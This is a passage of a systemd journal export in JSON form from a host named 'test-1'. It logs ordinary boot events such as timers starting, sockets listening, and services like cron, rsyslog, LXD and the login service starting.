"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ff;b=e2b08827b5804427b422c10c84f1567e;m=2a60eb8;t=5bd16df698e1f;x=4332bec02ad001a9", "__REALTIME_TIMESTAMP" : "1615280818720287", "__MONOTONIC_TIMESTAMP" : "44437176", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily Cleanup of Temporary Directories.", "UNIT" : "systemd-tmpfiles-clean.timer", "INVOCATION_ID" : "9700b3e9c7e94c8bbb5cb5eadd31c9ac", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817983403" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=300;b=e2b08827b5804427b422c10c84f1567e;m=2a60f56;t=5bd16df698ebe;x=2a7e2d8853f693cb", "__REALTIME_TIMESTAMP" : "1615280818720446", "__MONOTONIC_TIMESTAMP" : "44437334", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Successfully activated service 'org.freedesktop.hostname1'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818634485" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=301;b=e2b08827b5804427b422c10c84f1567e;m=2a610a1;t=5bd16df699009;x=34d30000e7628ab", "__REALTIME_TIMESTAMP" : "1615280818720777", "__MONOTONIC_TIMESTAMP" : "44437665", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on Open-iSCSI iscsid Socket.", "UNIT" : "iscsid.socket", "INVOCATION_ID" : "1eb0ced481574b02b745ff2eadecc1bc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817988812" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=302;b=e2b08827b5804427b422c10c84f1567e;m=2a6146e;t=5bd16df6993d5;x=9f850fb4e837414a", "__REALTIME_TIMESTAMP" : "1615280818721749", "__MONOTONIC_TIMESTAMP" : "44438638", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Discard unused blocks once a week.", "UNIT" : "fstrim.timer", "INVOCATION_ID" : "1d95b26b3cca4090b62056f0aa0ddd31", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817995335" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=303;b=e2b08827b5804427b422c10c84f1567e;m=2a61590;t=5bd16df6994f8;x=ea068fc4350924ac", "__REALTIME_TIMESTAMP" : "1615280818722040", "__MONOTONIC_TIMESTAMP" : "44438928", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Timers.", "UNIT" : "timers.target", "INVOCATION_ID" : "ccb21092f05e4b53901c1b69f443bc17", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818001033" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=304;b=e2b08827b5804427b422c10c84f1567e;m=2a6193f;t=5bd16df6998a6;x=1e56ba1aa417b00e", "__REALTIME_TIMESTAMP" : "1615280818722982", "__MONOTONIC_TIMESTAMP" : "44439871", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started ACPI Events Check.", "UNIT" : "acpid.path", "INVOCATION_ID" : "acbb7e4d2bbf44f59c42342ed64de95e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818006228" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=305;b=e2b08827b5804427b422c10c84f1567e;m=2a61f82;t=5bd16df699ee9;x=263882fa93cf9e82", "__REALTIME_TIMESTAMP" : "1615280818724585", "__MONOTONIC_TIMESTAMP" : "44441474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Paths.", "UNIT" : "paths.target", "INVOCATION_ID" : "611ff12fe3034976a9758296c68836c3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818008176" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=306;b=e2b08827b5804427b422c10c84f1567e;m=2a620bf;t=5bd16df69a026;x=112078bc5e9c2d29", "__REALTIME_TIMESTAMP" : "1615280818724902", "__MONOTONIC_TIMESTAMP" : "44441791", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on ACPID Listen Socket.", "UNIT" : "acpid.socket", "INVOCATION_ID" : "d144781f5fc04753bab3d0ab003bc3b1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818010071" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=307;b=e2b08827b5804427b422c10c84f1567e;m=2a621ea;t=5bd16df69a151;x=2c6f3fd245ed1a90", "__REALTIME_TIMESTAMP" : "1615280818725201", "__MONOTONIC_TIMESTAMP" : "44442090", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "blk-availability.service", "INVOCATION_ID" : "cc006751d3f34c1a8252273d8ffc9cdf", "MESSAGE" : "Started Availability of block devices.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818018341" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=308;b=e2b08827b5804427b422c10c84f1567e;m=2a6234f;t=5bd16df69a2b7;x=12dd4932c964faba", "__REALTIME_TIMESTAMP" : "1615280818725559", "__MONOTONIC_TIMESTAMP" : "44442447", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.socket", "INVOCATION_ID" : "c6935bf9d91547fda67694f77a0fb293", "MESSAGE" : "Listening on Socket activation for snappy daemon.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818023733" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=309;b=e2b08827b5804427b422c10c84f1567e;m=2a62561;t=5bd16df69a4c9;x=e23bc822a4dc114a", "__REALTIME_TIMESTAMP" : "1615280818726089", "__MONOTONIC_TIMESTAMP" : "44442977", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "lxd.socket", "INVOCATION_ID" : "0744372decba4f1bbe6fe5d4a8841f90", "MESSAGE" : "Listening on LXD - unix socket.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818026729" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30a;b=e2b08827b5804427b422c10c84f1567e;m=2a625c9;t=5bd16df69a530;x=fa87a3ac4fd2d1ff", "__REALTIME_TIMESTAMP" : "1615280818726192", "__MONOTONIC_TIMESTAMP" : "44443081", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Sockets.", "UNIT" : "sockets.target", "INVOCATION_ID" : "07a9deddd9d140e1853a06c0058677c3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818034574" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30b;b=e2b08827b5804427b422c10c84f1567e;m=2a6261a;t=5bd16df69a582;x=961e7e7821c825db", "__REALTIME_TIMESTAMP" : "1615280818726274", "__MONOTONIC_TIMESTAMP" : "44443162", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Basic System.", "UNIT" : "basic.target", "INVOCATION_ID" : "d287654c12884bad9dbb0b0de0e108f6", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818042137" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30c;b=e2b08827b5804427b422c10c84f1567e;m=2a62688;t=5bd16df69a5f0;x=3dcf5fd1dcd7fd00", "__REALTIME_TIMESTAMP" : "1615280818726384", "__MONOTONIC_TIMESTAMP" : "44443272", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LXD - container startup/shutdown...", "UNIT" : "lxd-containers.service", "INVOCATION_ID" : "69bb4a33e4a84106a814b4eb83881d94", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818047751" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30d;b=e2b08827b5804427b422c10c84f1567e;m=2a6290b;t=5bd16df69a873;x=d26f496ee754c981", "__REALTIME_TIMESTAMP" : "1615280818727027", "__MONOTONIC_TIMESTAMP" : "44443915", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Deferred execution scheduler.", "UNIT" : "atd.service", "INVOCATION_ID" : "1ebd91a7fefa4e53858a79ee62b15641", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818055768" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30e;b=e2b08827b5804427b422c10c84f1567e;m=2a62999;t=5bd16df69a901;x=bbd8fd3e43d9c647", "__REALTIME_TIMESTAMP" : "1615280818727169", "__MONOTONIC_TIMESTAMP" : "44444057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Regular background program processing daemon.", "UNIT" : "cron.service", "INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818064486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30f;b=e2b08827b5804427b422c10c84f1567e;m=2a629ee;t=5bd16df69a956;x=bfda37168b7b7553", "__REALTIME_TIMESTAMP" : "1615280818727254", "__MONOTONIC_TIMESTAMP" : "44444142", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Dispatcher daemon for systemd-networkd...", "UNIT" : "networkd-dispatcher.service", "INVOCATION_ID" : "83ebf910c7064affa22dd95766ea1937", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818074184" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=310;b=e2b08827b5804427b422c10c84f1567e;m=2a62a97;t=5bd16df69a9fe;x=449072b715fc5dc7", "__REALTIME_TIMESTAMP" : "1615280818727422", "__MONOTONIC_TIMESTAMP" : "44444311", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LSB: automatic crash report generation...", "UNIT" : "apport.service", "INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818083002" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=311;b=e2b08827b5804427b422c10c84f1567e;m=2a62b02;t=5bd16df69aa6a;x=54556e10ba188efd", "__REALTIME_TIMESTAMP" : "1615280818727530", "__MONOTONIC_TIMESTAMP" : "44444418", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started irqbalance daemon.", "UNIT" : "irqbalance.service", "INVOCATION_ID" : "1be2a31769ab44beb8244d37671930ea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818108770" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=312;b=e2b08827b5804427b422c10c84f1567e;m=2a62b8a;t=5bd16df69aaf1;x=fbcad028f3bb2848", "__REALTIME_TIMESTAMP" : "1615280818727665", "__MONOTONIC_TIMESTAMP" : "44444554", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting System Logging Service...", "UNIT" : "rsyslog.service", "INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818117517" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=313;b=e2b08827b5804427b422c10c84f1567e;m=2a63106;t=5bd16df69b06d;x=44466dd6d4bbe35a", "__REALTIME_TIMESTAMP" : "1615280818729069", "__MONOTONIC_TIMESTAMP" : "44445958", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Login Service...", "UNIT" : "systemd-logind.service", "INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818123449" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=314;b=e2b08827b5804427b422c10c84f1567e;m=2a63169;t=5bd16df69b0d1;x=2a228382b0220274", 